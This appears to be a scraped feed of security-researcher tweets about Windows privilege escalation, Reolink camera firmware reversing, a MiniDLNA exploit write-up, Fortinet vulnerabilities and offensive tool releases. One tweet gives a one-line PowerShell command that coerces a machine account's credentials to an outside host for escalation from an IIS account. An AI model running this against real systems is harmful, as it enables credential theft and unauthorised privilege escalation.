So MSRC first say that they cannot reproduce ,now say that no security boundary is crossed. Tested this on few different machines and it was successful on all of them.
This is bug in GamingServices , non default service so impact is not high.
https://t.co/ZH4jhQUhMT
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵
Great article from George Hilliard about a Reolink camera and the proprietary Baichun protocol he reverse engineered
Hint: /mnt/app/dvr
https://t.co/VzAibuHOww
This resulted in the great Neolink software producing real RTSP streams for Reolink cameras that come without this feature https://t.co/w9ANyJcsJt
And here the more active fork https://t.co/0YP38EFTUf
Unpack your Reolink cameras firmware made easy https://t.co/4Y7n5RdbZv
A great way to start reverse engineer the included software until Reolink complies with the GPL.
Hi @ReolinkTech, please send me the source code for the Lumus, C1-Pro and C2-Pro cameras that I own. You use GPL licensed software in your products which requires you to provide the source code upon request.
Many thanks.
part 2 of my latest blog post covering the heap overflow I found in MiniDLNA (CVE-2023-33476) is up! this one focuses on the exploit dev process used to get remote code execution and pop a shell. exploits included :D
https://t.co/0s8ENPMCUK
A new version of pywerview has been released! The tool can now work against DC with Channel Binding and LDAP Signing. s/o @rouge_cravate
https://t.co/LCC62QH5L7
🌻
Traitor
Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins, pwnkit, dirty pipe, +w docker.sock
https://t.co/sagsDgcK0f
#infosec#pentesting#redteam
Official confirmation from Microsoft that there is no supported way to rotate nor change DPAPI backup keys!
Compromised keys? ➡️ Burn the domain and rebuild a new one 💥
wifite2 v2.7.0 released.
Supports newest, rewritten hcxdumptool, cOWPatty is working again and allows airodump-ng to exit (running in bg mode). Enjoy 🙂
https://t.co/VUrET06OWB
#Fortinet published a patch for CVE-2023-27997, the Remote Code Execution vulnerability @DDXhunter and I reported. This is reachable pre-authentication, on every SSL VPN appliance. Patch your #Fortigate. Details at a later time. #xortigate
The critical #Fortinet#CVE-2022-42475 has made quite a buzz, and we’ve documented how you can create an #exploit targeting a single specific FortiGate appliance running a single specific version of FortiOS. https://t.co/vAhloDtnHE